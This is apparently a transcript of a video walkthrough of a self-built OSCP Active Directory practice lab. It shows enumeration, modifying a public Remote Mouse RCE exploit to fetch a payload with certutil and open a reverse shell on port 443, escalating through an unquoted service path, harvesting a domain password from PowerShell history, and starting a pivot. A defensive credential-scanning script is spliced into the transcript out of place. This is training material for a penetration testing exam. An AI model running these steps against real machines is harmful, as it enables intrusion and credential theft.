OSCP Practice Lab: Active Directory Attack Path #1

Captions
Hello everyone, welcome, and thank you for joining. What I wanted to do here was document my Active Directory practice lab that I built as part of my OSCP experience, and this video is specifically going to be one of the easy, quick attack methods that I practiced for getting ready for this component of the OSCP exam.

What we have in front of you: we've got our Kali box that's going to VPN in and get handed a 172.16.1.11 address, and across the VPN we'll be able to access the outside subnet, 192.168.100.0. From there we'll be able to hit MS01, which is .201. MS01 is a Windows 10 machine, dual homed. The intention here is that we know we have an initial target of a Windows workstation to hit, we know we have a subnet on the other side, and on the inside subnet there's going to be another Windows 10 workstation and a domain controller. These are named MS01 and MS02 for the workstations and DC01 for the domain controller. I tried to make this relatively straightforward and highly representative of what I expected to see on the Active Directory components of the lab.

So without further ado, let's kick things off. First and foremost, I knew I was going to have to VPN into a server of some sort that would hand me access. I believe they do call out that it's going to be an OpenVPN connection, because they want you to be ready to get that .ovpn file. So here I'm logging into my custom-built OpenVPN server and downloading my profile, which I would have received credentials for as part of my lab. Here we've got the profile; let's put that to use. Let's blow this up a little bit. I always like to be relatively organized, so I'll start by creating a couple of folders: one will be the Active Directory lab, and inside that let's make one for VPN and for our targets MS01, MS02 and DC01. Here we can see our folders. Let's go into VPN and move that... oh, we have multiple files here. Let's move that profile to... I'm going to guess it's actually, you know what, we're going to go with the 39 file and drop it into VPN. Oh really? Okay. So here we'll clear our screen and run openvpn. Sure enough, there we go, we are connected successfully, .11. Let's drop that out of the way. At this point we're now connected, we have our 172.16.1.11 address, we're connected to the VPN server, and we should be able to hit MS01 and begin our enumeration.

Often the first thing I'll do is go into the folders... actually, that's not true. The first thing I'll do is add these to my hosts file, just to make my life a little easier and use DNS names. So let's do so: 192.168.100.201 is going to be ms01; we know that the other one, 10.10.1.202, is going to be ms02; and 10.10.1.200 is going to be dc01. Save that and give it a test: ping with 2 counts to ms01. Well, it doesn't look like it's going to respond to us, but that could just be the firewall. We do see that the address translated to our IP, so we at least know that's working. Let's cancel that.

Now we're inside the ms01 folder, but we're going to want to stay organized, so I'll create a couple more folders: enum for enumeration, where I'll keep a lot of the stuff like my logs for scans I run, and then another one for loot, in case we find any goods like our local.txt or proof.txt files, which we know we are expecting; those are our flags that we need to pass the exam. And let's do files, if we find any files, and exploits, in case we need to download and work on any exploits.

From here let's run nmap. So we'll say sudo nmap, let's do -T4 because I want to do this quickly, -p- against all the ports, let's be verbose because I want to see very quickly what kind of progress we're making, or if we're making no progress, run this against ms01, and let's log this in the nmap format to enum/nmap-ports.log. Right off the bat we can see that, while the server MS01 didn't respond to pings, it does have 443 and 80 open. As soon as I see 80 or 443 open, I'm immediately thinking we're also going to want to run gobuster for some directory brute forcing, so let's do that as well. Let's split vertically so we can watch both of these go simultaneously, blow that up a little bit and bring that over.

Let's run gobuster, dir as our command, the URL is going to be http://ms01, and our wordlist. One of the common wordlists I would start with is DirBuster's common wordlist; there's also the big one, and if you really want to be intense or exhaustive and be pretty foolproof, I also like the SecLists medium directory and medium files lists. But let's not just leave this on the screen; let's split this off with tee and also save the output to enum/gobuster-p80.log, so we save our results as well. Oh, and we already got some good stuff here. Right off the bat we can see... that's funny, tee actually looks like it takes out the color. Just for giggles, let's run this without tee, because that was pretty quick, and now I get my pretty colors. In here we can see 403, we're not interested, that's access denied; 301, okay, so we have a dashboard; 200, favicon, okay; an image directory; an index.php file; and oh, okay, we have an uploads directory, which is
something I'm always interested in. An uploads directory tells me there may be some juicy goods there, or that we may have the ability to do some exploitation by uploading some content, maybe some client-side exploitation.

It looks like our nmap scan finished, so let's go back here. We've got ports 80 and 443, and we also found 1978, 1979 and 1980 open. Let's see if we can fingerprint those; they do not look familiar to me. So instead of running against all of the ports, now that we've enumerated and found what's open, let's fingerprint those and do some service enumeration. Let's call this one services.log, so we save it as a new file, and instead of running against all the ports we're going to run against only 80, 443 and 1978 to 1980, and also run our common scripts and version fingerprinting. So there we went through, discovered those ports are open, and now it's running service scans. Again, let that bake.

Come back over here and let's look at what we found with gobuster. First off, let's do some manual enumeration. We did find that ms01... okay, right off the bat we can see that it redirects to /dashboard. That tells us this is a default page and that it's XAMPP for Windows, so okay, that confirms a Windows box. We already know what services are running. Ooh, phpMyAdmin? Nope, but it does tell us the Apache version, the OpenSSL version and PHP. Oh okay, yep, sweet, we have phpinfo. One of the things I love about phpinfo when people leave it enabled, good old defaults, is that it also tells us where it's installed. In this case, yep, there it is: document root C:\xampp\htdocs. So right off the bat we have a better understanding of some file structure, and that this is a non-standard install in that it's not in C:\Program Files, for example. This is helpful.

Let's continue on. Dashboard: let's open that link; it takes us right back here, so that's the one we saw earlier. All right, how about images? Got two images; that looks like a default image, default image, so those are just part of our welcome page. What about... okay, we see index redirects to dashboard, so that's not helpful. What about uploads? Yeah, let's check out uploads. Hello! Here we can see we've got a file available to us. That is fantastic, so maybe this isn't something where we need to upload; maybe this is something where we're doing some discovery. So we downloaded that file. Hey, we created a files directory, so let's go to our files directory, move that file here, and let's also do some enumeration on it. There's a program called exiftool that will look at the metadata of any files you give it. Okay, this looks good, we've got some info. While the file name is some random string, we know it's a Windows 32-bit portable executable, it's meant as a Windows GUI application, and hello, this install was built with Inno Setup, so this is an installation executable for... company, software company: Remote Mouse, file description: Remote Mouse Setup. Hello! Not only do we have a software name, but we've got a version number. This is really juicy, this is good stuff.

There's usually something I do next with this, but it looks like our nmap scan finished. Okay, this doesn't look like it printed out very well, so let's clear; this is why we save our stuff. Let's just cat enum/nmap-services. What did we find? Port 80 Apache 2.4.56, 443 Apache 2.4.56 and "Welcome to XAMPP", so it looks like these are both the same web page, the same web capabilities, the same web server, just running on two different ports. And here we look at 1978: still don't know what it is, but we did send a bunch of fingerprint strings to it and this is what we got in response, so we still don't know what it is, but it does respond and tell us something. 1979 we don't know, 1980 we don't know, and we didn't have any responses from anything. And here specifically we can see yes, we have an unrecognized service on port 1978. We sent a whole bunch of these strings: time, x86_64-pc-linux-gnu, GenericLines, DNS version, LDAP string, LANDesk, we sent a bunch of things to it, and every time it looks like it sent back the same thing, which is what we're looking at here. The \x20 is a space, so it's just this same response every single time. All right, nothing super extravagant, but we've got some unknown ports.

Let's go back to the other thing we found here, which is this file. As soon as we find a version, what would we do with it? We want to know if this is some vulnerable software, so one of the first things we might do is look in searchsploit, which is the command-line searchable offline index for Exploit-DB. Let's type in "remote mouse" and see if we get any hits. Okay, we do get some hits. Let's be more specific then: how about "remote mouse 3"? How about "remote mouse 3.008"? Yes, this is very specific. Not only that, but we've got a local privesc and we've also got a remote... looks like remote command execution, arbitrary remote command. I like arbitrary remote commands; it means I can do what I want. Let's take a look at that. Let's go out of here into our exploits and do searchsploit -x 46697, tell me more. So Remote Mouse 3.008 fails to check for authentication and will execute any command any machine gives it. Wow, that's very safe. I love this, this is looking very promising, even tested on Windows 10. Okay, this script pops a calc as proof of concept, albeit a bit slowly, so that's something we need to keep in mind: this may be a slow exploit that we need to be patient for. It also has an index of key codes the app uses to communicate with the computer, if you want to mess around with it yourself. I love messing around with stuff myself; that's okay, this is fantastic. And it's running on Python 2, okay, so it's old, but that's fine, we can run Python 2. Oh, what is this? Right off the bat there's a function defined in here where we're
seeing we're going to open up a socket, connect to it on port 1978 (this is port 1978, this is port 1978), get a response, buffer it, basically a kilobyte it looks like, and if the response equals that... does that look familiar to you? That looks familiar to me; that looks like this. So if the response is that, return true, otherwise return false; except, so any exceptions, we'll just assume it's a request timed out. This is looking beautiful, this looks like a match. So let's kind of breeze through this: move mouse, mouse press, okay, we've got some different mouse options, left click, right click, middle click, oh, we can middle click, yay. Here it looks like a dictionary of all of the different keys we can send, a, b, c. Okay, here we go, main: try grabbing the argument and saving it as the target IP, make an exception if you don't give me that, and tell me "please tell me what exploit and then an IP address". If ping equals true, which we saw earlier is not actually ping, it's looking for this response, then pop_calc with the target IP. Here is pop_calc; what's it going to do? It's going to move the mouse -5000 pixels, 3000 pixels, this looks like moving to a corner, then we're going to left click, sleep for a second, then send a string, calc.exe, sleep for a second, and then send an end, so that's probably like a return character, like hitting Enter on the keyboard, right? And then print "success, process calc has run on target". So if I were to guess, this looks to me like it's going to move this, maybe down to the bottom left corner, hit the left mouse button, which if I were to move down to the bottom left corner on Linux, it doesn't give us anything, just the bottom left corner, but on Windows, what's in the bottom left corner? That's the Start menu. So if I clicked on Start and started typing in calc.exe, it's just going to offer up calc.exe, and as soon as I hit Enter, it's going to open it. So if I were to guess, I would say that's exactly what it's doing: it's clicking on Start, typing this out and then hitting Enter.

So we can abuse this. We don't want to open calc; what do we want to do? We want to get an initial foothold. How do we do that? Well, it's definitely not with calc. If this was a Linux machine we could use netcat or do some living off the land perhaps, but in this case we probably need to generate a shell, or generate a payload that will give us a shell, so we can use msfvenom for that. Once we have a payload, how do we get it over there, how do we execute it? Well, what's one of the native tools we could use? One of my favorite tools is the certificate utility, so we could use certutil and have it transfer the payload from our Kali box right over to MS01, and then execute that payload, which would then give us a reverse shell back to our Kali box. So let's give that a shot, let's see if we can do this.

Let's download this exploit, since it looks like a match, and then tweak it a little bit. But first we need to build a payload; actually, we need to have something to serve up. So mkdir payloads, let's go into our payloads directory, because we may end up reusing these a few times. Let's create a reverse shell. If anyone's familiar with msfvenom, that's one of our favorite tools that we love to use, especially on the OSCP. Let's create a payload: it's going to be Windows 64-bit, and what do we want? We want a shell; a reverse TCP shell is what we want. Where do we want it to call back home to? LHOST, the local host, in this case that's going to be our VPN IP, 172.16.1.11. What port do we want it to call home to? Ooh, okay, that's a good question. We could use an arbitrary port like 4444, but we saw that ping wasn't responding earlier, which indicates Windows Firewall is probably on, so if we have it go back on just any random port, it's probably not going to be able to get through the firewall. What ports do we have open, or that we know are open through the firewall, that we can take advantage of? My money, one of my favorites, it's 443, right? We know it's open because we can access the web server, we scanned it with nmap, we know it's open, so let's use 443 as our callback. That should get through the firewall. What else do we need? We need a format that's going to be an executable, and we need to spit it out as a file instead of just a raw payload, so let's spit it out as win_rev_443.exe. If I didn't screw that up it should give us a payload, and sure enough it does. I did not select the platform, but it noticed the payload does Windows; I didn't select an architecture, but it saw the payload is 64-bit; it did not encode it, so it is raw; and sure enough we have a file saved as win_rev_443. Beautiful.

Now we need to be able to serve it up, though. How are we going to get it there? Let's just do a quick and dirty Python, open up a module, how about the web server module, and run it on port 80. Boom, we have a web server on port 80 running right now on our Kali box. How do we get it over there? This is where we're going to abuse... well, we're going to modify this exploit. If we jump down to line, I don't know, let's call it 120. Oh, that was pretty good actually. Here's our pop_calc, here's where it's
going to type in calc. I mean, we want to move to the bottom left, we want to click, and we want to wait for a second and open up the Start menu. We don't want to enter calc.exe, though; we do want to send a string, so how about instead of calc.exe we use that cert utility. So certutil.exe; it helps if you can spell right; there's no spell check on here, Darren, don't screw it up. So let's do certutil, let's do -urlcache because we want to pull this over the network, -f, http://172.16.1.11, how about win_rev_443.exe is our name, running out of space here, let's pull this over, and we have to tell it where to save it. Most folks like to save things in C:\Windows\Temp\win_rev_443.exe. I don't, though. I actually prefer, if you were to fingerprint what Darren's tactics are that he likes to use, he likes to be different, so he'll use C:\Users\Public, because that's also a publicly writable location. Let's close this... whoops, cancel that, there we go. So let's close that quote, and then we need to tell it to go to the IP. That should work, and then we'll sleep and hit Enter and it will download.

Let's save that and do this one step at a time. First and foremost, we'll be able to see any progress on the left-hand side. Let's clear this screen on our web server; we should see the request come through. Let's do python2 and our exploit, and just check. Oh, sure enough, it does not like what we've typed in here. What did we miss? Line 119, with the comma; it does not like our comma. Let's go to line 119. We've got send string, certutil.exe, urlcache, all that good stuff, extra space, we can get rid of that, looks right. Oh, Python 3, that's the problem. Python 2, Darren. Okay, so Python 2 works for us, and it tells us we're missing a variable, so let's do python2... well, first of all, clear, python2 and ms01. Here we go. We don't know if this is going to work or if it's not going to work, because we don't really get a lot of feedback, and we also know it's going to take a while, so the only indication we can look for is if our web server gets a request. If it does, we'll see it pop up in here. If we didn't mistype anything and it asks for the file that's available here, we'll return a code 200 to say "yes, here you go, here's the data". If we see a code 404, that's telling us we probably mistyped something, and that it did make the request, but we didn't have the right file or data or directory to serve up to the request. So we'll see if this comes through here, but as of right now it's at least running. And sure enough, there we go. This is fantastic, this is exactly what we wanted to see: a GET request for win_rev_443.exe, and we return a code 200, which means "yes, here you go". So step one complete. Let's kill this web server, clear that, and edit our exploit.

Step one complete, download our payload. Step two is execute our payload. So let's comment that out but keep it around. Send string: we're just going to change the string now, right? We're going to say now I want you to go C:\Users\Public\win_rev_443.exe, send that to the IP, and then sleep and hit Enter, and then instead of saying "process calc has been run", "success, victim has been pwned". All right, but we're going to need to catch that shell, right? So let's set up our listener: good old netcat, -l listen, -v verbose, -n no name lookup, and -p port 443. All right, we're listening. Let's run this bad boy and hope for the best. Again, be patient, because it feels like it takes time to probably move the mouse and then click these buttons. If this was a real environment then we'd very much be picked up by the end user on that machine, seeing their mouse move and then seeing characters being typed in; it would be pretty apparent that something is wrong. But being the OSCP exam, it doesn't matter, we know this is a headless device. And sure enough, here we go: "success, victim has been pwned". That doesn't mean anything; what does mean something is we've got a shell. Smell that nice fresh shell. First thing you do when you land on a new box, right? We can see it's Windows version 10, fantastic, but the second question you ask is "who am I?" Ah, okay, so I am Lucy on MS01. This confirms we are a local account on MS01, not a domain account. Well, the second thing we want to know, now that I know who I am, I'm Lucy, the second thing I want to know is what privileges I have, right? Okay, these are default privileges, see those all the time, but this one is not: shutdown privilege. So this actually means, even though it says state disabled, it actually means that the security privilege is not enabled, so I actually have the ability to shut down the machine. From an operational standpoint that may seem weird: okay, Darren, you can shut down the machine, it's not going to do you any good. But what it also means is that if I want to exploit a service or scheduled task that occurs upon startup, I may not have the privilege to execute that task or restart that service, but if I have the ability to reboot the machine through the shutdown command, then actually I do have the ability to restart that task or that service. So that's something to keep in mind and something to look for: once you notice you have a certain privilege that stands out, see if there are ways to take advantage of it.

Now there are a number of different things we would do through here, like run net user, see if there are any other local users on here; net localgroup administrators, tell me more about who has administrative access on this machine. Oh okay, so the Domain Admins have access, well, that makes sense, that's a default, but that also verifies this is a domain-joined machine. Now there are a number of other commands we could run, and again, as someone who's taking the OSCP, you should have your short list or your cheat sheet or your reference material for all the commands to run, but one of the ways to collect a lot of that data quickly is to actually leverage the PEAS. In this
case there are two versions: there's LinPEAS, and winPEAS for Windows, so you can guess we're going to want winPEAS. Now you can just Google this; I will go to the GitHub, go to the releases here, and sure enough here are all of our versions, LinPEAS, winPEAS. We're on a 64-bit Windows machine, so we're going to use winPEAS x64. When we go back over here, let's stage this and transfer it over. So instead of our exploits, let's go back over here to payloads, and let's move Downloads/winPEAS to here, only we're going to call it win.exe to make things a little easier. Okay, did I miss something? Oh okay, thanks for that. So we're going to rename that to win.exe. Okay, so there we go, now we've got winPEAS named, we can see it's not hidden, and we're going to run our Python web server again and grab this. Again, I like to go back to C:\Users\Public, and here we can see our reverse shell payload. Let's add to this; let's use this as our little repository. So certutil.exe -urlcache -f http://172.16.1.11, what do we want? We want win.exe, and save it as win.exe. Sure enough, it downloads it, and we saw the 200 code here. So now we have winPEAS on our machine; let's use this.

Again, continue to do your manual enumeration, but also don't forget to use the best tool for the job and supplement your manual searching with something like winPEAS, which will go through and automatically collect a lot of the same data you would. So use this to get the bulk of the data, let's say 90%, and then manually enumerate the last 10%, especially because you need to be efficient and time is not on your side: for the OSCP you've only got 23 hours and 45 minutes. So we're going to let this run. Again, I would typically have two shells running, so I'd run the exploit again and have another shell open, because you can have as many shells as you want, right? And then run winPEAS in one, and while it's running go ahead and do your manual enumeration. In this case I'm going to pause the recording, and we're going to jump back in here in a couple of minutes when this is done.

Okay, well, while winPEAS is running we actually have enough data on here that we can start to review some of it. Now, I'm not going to review all of it; if you're familiar with winPEAS and LinPEAS you know that you get a ton of data, so the key is again to know what to look for and how to look through it quickly. Some of the key things: we'll go back up here, start at the top. Anything in red is generally worth looking at; that's a high-priority item to evaluate. Anything else, you want to look for specific things. So System Info, this is great, confirms things like the domain name, oscp.lab, fantastic, tells us a little bit more about the machine, confirms some of the things we already knew. If you do, in this case, get some vulnerabilities, powered by Watson, love you Watson, then they're worth looking at or keeping in your back pocket: if you've tried everything else and you've enumerated everything else and haven't found anything, kernel exploits, or Windows kernel exploits, are always fantastic options, and in some cases if you're familiar with some of them you may immediately say "oh, this is worth evaluating, this might be viable"; otherwise, hit and miss, I would say in my experience more miss. Now as we go through here, great, system environment variables, worth looking at, nothing stands out there. LAPS is not installed. LSA, Credential Guard, cached logons: that's always good and interesting; when we have cached logons that's potential that once we get admin we can look for some credentials. Prompting for Windows binaries; we don't have any PowerShell history, so we can't gather anything there. Some of these checks require admin privileges, which we do not have. Okay, LanMan compatibility, NTLMv2, so that tells us what kind of passwords we can get is only NTLMv2, so we need to be able to crack them; we're not going to be able to pass them if we gather them by just the hashes themselves. Pipes, all this good stuff I would normally start to evaluate. Okay, users: oh, local Administrator is disabled, so that's not helpful. Lucy's on here, not seeing any other users, so it looks like we're going to need a domain user if we want to elevate privileges, or we're going to have to exploit something, because there are no local admins we can take advantage of either, at least not that are enabled. Okay, here we go, ever logged on users: we have another user, an OSCP domain user called wildstyle. Okay, I like it, sounds like a Lego theme maybe: Lucy, Wildstyle. So this is something to search for, and this is confirmed when we look at home folders: there's a wildstyle folder as well. Autologon credentials: we can see Lucy is there. And as we go through this, processes are interesting, see if there's anything red that jumps out: winPEAS, well, that's because we're running it, so that's why we get the ability to hijack our own process, same thing with the reverse shell. OneDrive, interesting, but that's again our OneDrive, so not helpful. Vulnerable leaked handles: you'll get a ton of stuff here that's not really helpful at all, it's just a bunch of noise, so we scroll through this.

As we get down, the next section is services. This is an area where we definitely want to pay some attention as well, because we saw earlier we could shut things down, or do the restart, the shutdown permission. Okay, possible DLL hijacking with Apache because we can write and create files; may or may not work. Remote Mouse service, "no quotes and space detected", okay, so an unquoted service path there, maybe. And oh, here we go though, Wise Boot Assistant: here we see "no quotes and space detected", and we also have file permissions in that we can write data and create files. So this looks like the better option; we don't have those kinds of permissions up here, so this looks like something we want to take advantage of. So how would we take advantage of this, how could we exploit this? If you answered,
well we want to create an executable called apps wise wise. exe that's going to get executed before it looks into y care 365 for something else so that's what we need to do well how can we take advantage of that we can create another payload or we can take advantage of the fact that we already have a payload there ready to use so let's see if we can do that let's go ahead and change so here we have our wind rev 443 let's go ahead and move to the C drive here we can see we've got apps set up ooh anything under setup yeah Auto log on that's not cool not helpful Z amp which we saw earlier and then apps so let's go into our apps where we saw that there is the wise directory but where things diverge this is where we're going to take advantage of the space we're going to say copy users public is it when rev 443 exe to here and we're going to call it y.exe so now sure enough we had permission to do it it let us so we've got a wise. exe so well we don't have the ability to restart that permission cuz we're just a limited user what we can do for sure is restart the box and have a listener at the ready and instead of being Lucy because this is running as well did we see we did not see actually so let's go and clear the screen here and get rid of some of this clutter CLS I guess that doesn't really work on down here we can do this so we can use the good SC for service control and I believe it's QC to look at the configuration of what was it y something QC can we do an asterisk of course not then that's fine in that case how about just SC talking about SC query okay so SC query and then we can do SC query Finster I don't care about case wise there it is wise boot assistant so SC QC wise boot assistant boom there we go okay so here we can see we should get a shell as local system that is exactly what we want we want to get elevated so fingers crossed let's go ahead and stop here and what we'll do is we're going to kill this and open up a listener as quick as possible so we'll 
say shut down reboot in 1 second do it uh and we got dropped so really quickly same thing we're going to listen and hope for the best we should get a [Music] shell oh yeah this is what we wanted to see sure enough we got a new Fresh shell and what's the first thing we do when we get a fresh shell who am I bam we are system on Ms o1 we just got admin access so at this point I would typically go ahead and and pill for the loot because now we have full access as the local user uh Lucy what I forgot to do what we should do is we should have looked for our local. text because the limited user should have a local. text but as admin we should be able to find the admin loot which is the proof. text so let's go ahead and do that first and foremost so I'll start by just going to the root directory usually under users because these files are supposed to be on Windows underneath folks desktops here we can see we've got admin Lucy wild style of course the default public let's just do a quick search for our files though so we'll do SL s/b and we're looking for local. text yes and sure enough it actually was under Lucy's desktop again manual enumeration which we should have been doing concurrently with wipes would have found that so let's go ahead and type that out paste selection boom there's our loot for local. text so let's go ahead and save that msl1 loot and let's just Echo paste selection into local. [Music] text sure enough there we go now let's find our admin loot so SL SB slsb I don't know why that's so hard for me to say and we're looking for proof. text Absol absolutely just as expected admin desktop as it is supposed to be if it exists on the exam so let's go ahead and type that out and sure enough there we go we're cooking that is our proof. 
txt. Yeah buddy, now we're making progress. We got our loot. If this was the exam, what we should be doing is gathering both of these and then typing in whoami and ipconfig, and then I also, for good measure, like to type in hostname, and then you would grab a screenshot. Oops, I wanted to make it smaller. Well, anyway, we would grab a screenshot of this so that... there we go, that's what I was shooting for. Screenshot all of that, and that would be your proof for submission of those two, and you would also submit these hashes with the corresponding IP address in the submission form.

So with that being said, we have not only gotten an initial foothold on MS01, but we have also gained local admin access on MS01. We haven't gotten into the Active Directory components yet; we still need to pillage for that and figure that out, but we've at least gotten the ability to start leveraging that admin access to enumerate more of MS01 and look for some Active Directory crumbs that will allow us to start to enumerate more internally. The other thing we can do is create a pivot point; we should definitely do that. So first and foremost, now that we see we've got our dual-homed machine, let's continue to enumerate, and then after that let's create our pivot, and then we can use that pivot to enumerate further.

With that, I'm going to go ahead and clean some of this up, and we can clear this, and we're good to go, back in action. Oh, and one thing that we definitely, or I definitely, forgot to do is take good notes. I've been doing that on the side here; I've not been doing that while we've been working in Kali. So let's take my notes. Typically, as you're going through and doing the OSCP exam, and as you're practicing, you should be taking plenty of notes. We'll just open Mousepad, let's go ahead and use that, and drop in my notes that I've been taking on the side. Let's move this around, let's minimize that. So, first
and foremost, we know what our hosts are, and we typically would have known this based upon, again, the submission portal and the control panel, where we can reboot the hosts, reset them, and also where we are going to submit our flags. Things to try: this is, as we begin and as we continue enumeration, and as we find potential vulnerabilities or new things that we need to enumerate further, where we list those things to try out. Open ports: well, we've scanned MS01 so far, and this is what we've found. And then the path to compromise: I always like to keep a log of, okay, how have things progressed, what's the storyline been like, or if I were to build a timeline, what would that look like?

So here we can see we found that web server on MS01 with a file that was an executable. We downloaded that file, and the metadata revealed that we had Mobile Mouse 3.0.8 software potentially installed, and we noticed that it listens on a port that actually happens to be open as well, and it's vulnerable to unauthenticated remote code execution. We then exploited that vulnerability and used it to download a payload and obtain a reverse shell as Lucy, and we used WinPEAS at that point, and it revealed that the Wise Boot Assistant service was there and it was vulnerable to an unquoted service path attack, and we used that to obtain a privileged reverse shell. At this point, what we should be doing is leveraging that shell to continue further enumeration. So our next step would be further enumeration of MS01 with the intention of finding Active Directory breadcrumbs, something to allow us access to Active Directory, because at this point we're on MS01 and we should be able to ping and reach around internally, but we don't even have credentials to query services on DC01 or MS02. Nothing that we have with Lucy or Local System access is going to allow us to get any internal access to Active Directory. So with that, let's continue to enumerate. Normally we
would go through our processes and do some manual enumeration. I immediately saw earlier, and one of the things I would start to work with, is looking in the Users directory and noticing, and we saw this earlier, that there was a previously logged-on user, Wildstyle. That's a domain user. Well, as a local admin, or someone with local admin access with our privileged shell, we can actually go into Wildstyle's directory and see inside. Everything looks normal. One command I like is tree, and I believe the flags are, yeah, /f /a. Here it shows us there's basically nothing here; if we had a file underneath, it would enumerate and show further. So in this case, nothing is jumping out, but there are hidden directories in here as well, so let's just do a quick search. One of the first things I'll look for is text files: are there any log files? Okay, there's a PowerShell log file. And I'll also look for, are there any text files? Same thing. So we're seeing somebody was using PowerShell. Let's check that out; I'm immediately going to prioritize someone's command history with PowerShell. So let's type that out: tell me what's been going on, what has Wildstyle been doing? And we struck gold here. We can see they were obviously running some commands like ipconfig and hostname, but then this looks like a remote PS session: they tried to run a PowerShell session over to another machine called MS03, which doesn't exist, or didn't exist at the time of this; obviously we only have MS01 and MS02, but they tried to, or did, connect to MS03 with these credentials, and we can see they used the username Wildstyle, and this is Wildstyle's password. So at this point we need to update our information; we got some new stuff. We found our Active Directory breadcrumbs. Again, normally I would have spent a little bit more time doing some further enumeration and wouldn't typically find this very quickly, although it is one of the first things I will do.
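The breadcrumb found here is a plaintext password sitting in a user's PSReadLine history, which is exactly what a periodic hygiene check on workstations should catch before an attacker does. The script below is an added example (it is not from the video): it scans lines in the shape of a ConsoleHost_history.txt file for the common ways a password ends up on the command line and reports each hit with the secret already redacted, so the report itself does not spread the credential. The history lines are constructed for this example; the account and host names echo the lab, and the password value is a placeholder.

```python
"""Scan PowerShell command history for plaintext credentials.

Added example, not part of the video. PSReadLine records every interactive
command in
  %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
so a defender can sweep those files (one per user profile) for secrets. The
sample history below is constructed; "Constructed_Pa55!" is a placeholder.
"""
import os
import re
from pathlib import Path
from typing import List, Tuple

# Each rule: (name, regex). The named group 'secret' is what gets redacted.
RULES = [
    ("secure-string-plaintext",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?(?P<q>['\"])(?P<secret>.*?)(?P=q)"
                r"[^|;]*-AsPlainText", re.IGNORECASE)),
    ("password-parameter",
     re.compile(r"-(?:Password|pwd)\s+(?P<q>['\"]?)(?P<secret>[^'\"\s;|]+)(?P=q)", re.IGNORECASE)),
    ("net-use-password",
     # last token before /user: is the password, e.g. net use Z: \\srv\share <pw> /user:dom\u
     re.compile(r"net\s+use\s+(?:\S+\s+)*?(?P<secret>(?!\\\\)\S+)\s+/user:", re.IGNORECASE)),
    ("net-user-add",
     re.compile(r"net\s+user\s+\S+\s+(?P<secret>\S+)\s+/add", re.IGNORECASE)),
]

# Default location for the current user; real path, only used when run on Windows.
DEFAULT_HISTORY = (Path(os.environ.get("APPDATA", ""))
                   / "Microsoft" / "Windows" / "PowerShell" / "PSReadLine"
                   / "ConsoleHost_history.txt")


def scan_history(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, rule_name, redacted_line) for each hit, 1-indexed.
    One finding per line is enough for triage, so the first matching rule wins."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for name, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            s, e = m.span("secret")
            hits.append((n, name, line[:s] + "<REDACTED>" + line[e:]))
            break
    return hits


def scan_file(path: Path = DEFAULT_HISTORY) -> List[Tuple[int, str, str]]:
    """Convenience wrapper for a real history file."""
    return scan_history(path.read_text(encoding="utf-8", errors="replace").splitlines())


# Constructed sample history modelled on the lab finding (placeholder password)
SAMPLE_HISTORY = [
    "ipconfig",
    "hostname",
    "$pw = ConvertTo-SecureString 'Constructed_Pa55!' -AsPlainText -Force",
    "$cred = New-Object System.Management.Automation.PSCredential('OSCP\\wildstyle', $pw)",
    "Enter-PSSession -ComputerName ms03 -Credential $cred",
    "net use Z: \\\\dc01\\backups Constructed_Pa55! /user:OSCP\\wildstyle",
    "Get-ChildItem C:\\Users",
]

if __name__ == "__main__":
    for n, rule, redacted in scan_history(SAMPLE_HISTORY):
        print(f"line {n:>3}  {rule:<24}  {redacted}")
```

Line 4 of the sample, which only references the `$pw` variable, is not reported: the secret was already caught on line 3, and a scanner that redacts the literal is enough to decide that the credential must be rotated. In an estate-wide sweep the same function runs over every profile's history file, and the hit list feeds a rotation ticket rather than a report that quotes the password.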
I start by looking for any additional user data or user history that stands out when looking at the WinPEAS logs. So at this point we found Wildstyle's credentials in the PowerShell history on MS01. Let's go and save this and drop it into our Desktop, Active Directory lab folder, and we're going to call this notes. Oops, there we go. So at this point we need to do our next step, and we also need to add in: we've got open ports, what else have we discovered? Credentials. So we have MS01 Lucy's hash, that's in the WinPEAS log there; we can go back to our console history if we need to. We also now have oscp\wildstyle, and that, oops, is awesome24, exclamation, or bang. Let's copy that, add that, save our notes.

What would we do next, now that you've got some credentials? What would you do? I know what I like to do: I like to immediately start to use that to enumerate further Active Directory credentials, users, and information. There are a few ways we can do that, but let's just go ahead and mark this down: enumerate Active Directory further with Wildstyle. So at this point, let's go ahead... actually, let's go and clear our screen the old school way, let's save this, shrink that down.

Well, at this point you're probably wondering what's next. How do we get access to this inside network from our Kali box, when right now we can only get access to MS01? And the answer to that is, well, there could be a couple of different answers, but one of my favorite answers is a piece of software called Ligolo-ng. This is a fantastic pivoting tool that allows us to essentially create an interface and then leverage that interface for our pivoting. So let's go ahead and download this. We're going to need two things: we're going to need the agent that's going to run on our victim, so we'll want the Windows 64-bit, and the other thing we're going to need is the proxy, which we're going to run on our server, or Kali in this case, so we'll go with the Linux 64-bit. At this point, let's go ahead and follow
the instructions here and get it set up. It's actually pretty easy. So from here, let's bring this over... actually, let's go to our Downloads directory. Here we have our files, and let's just go ahead and extract, and there's our agent, so we're going to move that to our Desktop and payloads. The other file we're going to need, I believe in this case it's going to be this gunzip file, so is it gzip? Yeah, so in this case we want -d. There's our tar, so in this case, was it untar? tar xvf, sure enough, there's our proxy file. Let's go ahead and move that, because that's what we're going to run on our Linux box. Let's move that to our bin directory: sudo mv proxy /usr/bin. Now let's go and remove all this, and let's make sure we have our proxy. Boom. All right, so things are looking good.

Let's go ahead and follow our setup guide here. So the first thing we're going to do is create an interface; in this case it's mode tun, ligolo. Then we're going to go ahead and set it to the up status: sudo ip link set ligolo up. All right, so now our interface has been created and it's up, so if we were to do ifconfig, you can see there's tun0... oh, it wouldn't be in this case, sorry, ligolo. Okay, so now at this point we need to actually get the agent to connect, and then we can continue on. So now what we need to do is get the agent file moved over to our victim. Let's go back to our payloads directory and create our Python web server. Now we can serve up the agent, and let's go ahead and transfer that over. Again, I like to put it in my Public directory, so we'll do certutil -urlcache; we're going to transfer agent.exe. Uh oh, helps if you can spell. Let's try that again. Much better. All right, so at this point we've got the agent ready; we need to create our server proxy. So we'll stop our web server, and in this case let's go ahead and run our proxy server. So we'll say proxy
